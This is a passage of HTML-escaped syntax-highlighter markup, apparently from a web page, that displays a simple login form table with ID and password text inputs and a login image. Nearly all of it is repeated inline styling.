class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ID&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;text&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;uid&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;uid&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;rowspan&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;3&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/login.jpg&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;270&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;style&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;margin-left: 20px; margin-top: -38px; position:fixed;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;PW&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;colspan&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;text&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;upw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;upw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) 